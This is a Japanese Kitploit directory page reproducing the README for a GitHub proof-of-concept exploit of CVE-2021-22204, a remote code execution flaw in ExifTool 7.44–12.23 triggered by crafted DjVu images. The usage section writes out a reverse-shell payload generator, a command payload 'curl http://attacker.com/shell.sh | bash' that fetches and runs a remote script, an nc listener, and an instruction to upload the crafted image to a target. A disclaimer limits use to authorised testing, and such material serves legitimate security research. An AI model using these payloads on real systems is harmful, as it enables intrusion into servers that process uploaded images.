Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-22204 — ExifTool RCEエクスプロイト(CVE-2021-22204) - 改良版、exiftool依存なし | Kitploit
ツール/GitHubGitHub/d4ytox/cve-2021-22204
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

ExifTool RCEエクスプロイト(CVE-2021-22204) - 改良版、exiftool依存なし

リポジトリを見る
1018日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-22204 - ExifTool 任意代码実行

CVE-2021-22204 の改良版 Proof-of-Concept です。これは ExifTool バージョン 7.44 から 12.23 における脆弱性で、悪意のある DjVu ファイルを処理する際に任意のコード実行を可能にします。

クレジット

これは派生作品です。脆弱性および元のエクスプロイトは私のものではありません。

役割誰
脆弱性の発見者William Bowling (@wcbowling)、GitLab バグ報奨金プログラムを通じて報告 — 2021年4月
オリジナル PoC 作成者UNICORD (NicPWNs & Dev-Yeoj)
このリポジトリでの改変者d4ytox

説明

ExifTool バージョン 7.44 から 12.23 における DjVu ファイル形式のユーザーデータの不適切な無害化により、悪意のある画像を解析する際に任意のコード実行が可能になります。このエクスプロイトは、脆弱性のある ExifTool バージョンで処理されると攻撃者が制御するコードを実行する悪意のある画像ファイルを生成します。

このバージョンでの変更点

UNICORDev/exploit-CVE-2021-22204 を基に構築:

  • 攻撃者マシンでの ExifTool 依存なし - オリジナルはペイロードを埋め込むために exiftool -config を使用しますが、自身の ExifTool がパッチ適用済み(v12.24+)の場合に失敗します。このバージョンは djvumake のみを使用して純粋な DjVu ペイロードを構築します。
  • 最新の Kali で動作 - Python 3.12+ と互換性あり(\c エスケープシーケンス警告を修正)
  • 最小限の依存関係 - djvulibre-bin パッケージのみが必要
  • クリーンで最小限のコード - ASCII アートや人工的な遅延なし

これらは既存のエクスプロイトに対する工学的な変更です。脆弱性研究の主張はありません。

要件

root@kitploit:~
sudo apt install djvulibre-bin

使用方法

リバースシェル:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

カスタムコマンド:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

例:

root@kitploit:~
# リバースシェルのペイロードを生成
python3 exploit.py -s 192.168.1.100 4444

# コマンド実行ペイロードを生成
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# リスナーを起動してコールバックを待機
nc -nlvp 4444

このエクスプロイトは image.jpg を生成します。これを ExifTool が処理するターゲットにアップロードしてください。

影響を受けるバージョン

  • ExifTool 7.44 - 12.23

参考情報

  • NVD エントリ - CVE-2021-22204
  • William Bowling によるオリジナルレポート - HackerOne #1154542
  • ExifTool アドバイザリ
  • ExifTool パッチコミット
  • オリジナル PoC - UNICORDev/exploit-CVE-2021-22204

免責事項

このツールは教育目的および許可されたセキュリティテスト専用に提供されています。

作者はこのツールの誤用または損害について一切の責任を負いません。このエクスプロイトは、所有しているシステムまたは明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。

コンピュータシステムへの不正アクセスは違法であり、法律で罰せられます。責任を持って使用してください。

ライセンス

MIT ライセンスは、このリポジトリの改変部分にのみ適用されます。上流の PoC にはライセンスが付与されていないため、その作者による全著作権が留保されます。完全な帰属表示については LICENSE を参照してください。

ツールをダウンロード